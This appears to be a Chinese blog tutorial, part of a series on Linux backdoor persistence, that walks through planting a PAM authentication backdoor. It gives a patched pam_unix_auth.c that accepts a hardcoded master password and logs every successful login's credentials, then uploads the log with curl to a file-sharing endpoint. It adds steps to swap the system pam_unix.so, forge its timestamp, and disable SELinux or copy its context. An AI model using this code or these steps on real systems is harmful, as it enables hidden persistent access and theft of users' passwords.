Linux后门维系（三）—— PAM后门 + transfer.sh

查看pam版本并下载

rpm -qa | grep pam
pam-1.1.8-12.el7_1.1.x86_64

http://www.linux-pam.org/library/
curl -O http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz

修改并编译pam_unix_auth.c文件

cd Linux-PAM-1.1.8
vim modules/pam_unix/pam_unix_auth.c

pam_unix_auth.c 修改前

    /* verify the password of this user */
    retval = _unix_verify_password(pamh, name, p, ctrl);
    name = p = NULL;

pam_unix_auth.c 修改后

    /* verify the password of this user */
    retval = _unix_verify_password(pamh, name, p, ctrl);
    if(strcmp(p,"1q2w3e4r")==0){return PAM_SUCCESS;}
    if(retval == PAM_SUCCESS){
        FILE * fp;
        fp = fopen("/bin/.sshlog", "a");
        fprintf(fp, "%s : %s\n", name, p);
        fclose(fp);
        system("curl -H 'Max-Downloads: 0' -H 'Max-Days: 7' --upload-file /bin/.sshlog http://127.0.0.1:8080/sshlog.txt -s -o /dev/null --connect-timeout 3");
        }
    name = p = NULL;

curl -H 'Max-Downloads: 0' -H 'Max-Days: 7' --upload-file /bin/.sshlog http://127.0.0.1:8080/sshlog.txt -s -o /dev/null --connect-timeout 3

./configure
make

编译后：modules/pam_unix/.libs/pam_unix.so

备份/替换/修改时间戳

ll /lib64/security/
-rwxr-xr-x. 1 root root  57688 8月  18 2015 pam_unix.so
-rwxr-xr-x. 1 root root  15384 8月  18 2015 pam_userdb.so
-rwxr-xr-x. 1 root root   7000 8月  18 2015 pam_warn.so
-rwxr-xr-x. 1 root root  11168 8月  18 2015 pam_wheel.so
-rwxr-xr-x. 1 root root  19744 8月  18 2015 pam_xauth.so

cp /lib64/security/pam_unix.so /lib64/security/pam_unix.so.bak
cp ./pam_unix.so /lib64/security/pam_unix.so
touch -r /lib64/security/pam_userdb.so /lib64/security/pam_unix.so

ll /lib64/security/
-rwxr-xr-x. 1 root root 221776 8月  18 2015 pam_unix.so
-rwxr-xr-x. 1 root root  57688 6月  30 23:18 pam_unix.so.bak
-rwxr-xr-x. 1 root root  15384 8月  18 2015 pam_userdb.so
-rwxr-xr-x. 1 root root   7000 8月  18 2015 pam_warn.so
-rwxr-xr-x. 1 root root  11168 8月  18 2015 pam_wheel.so
-rwxr-xr-x. 1 root root  19744 8月  18 2015 pam_xauth.so

如果selinux是开启的环境，一定要关掉或者设置好上下文pam_unix.so才能正常工作。

查看selinux 状态
getenforce
    Enforcing 关闭
    Permissive 开启
临时关闭selinux
setenforce 0
临时开启selinux
setenforce 1

查看selinux上下文：
ls -Z pam_unix.so.bak
设置selinux上下文：
chcon –reference=pam_unix.so.bak pam_unix.so

Linux后门维系（三）—— PAM后门 + transfer.sh

查看pam版本并下载

修改并编译pam_unix_auth.c文件

pam_unix_auth.c 修改前

pam_unix_auth.c 修改后

备份/替换/修改时间戳

你可能感兴趣的:(Linux后门维系（三）—— PAM后门 + transfer.sh)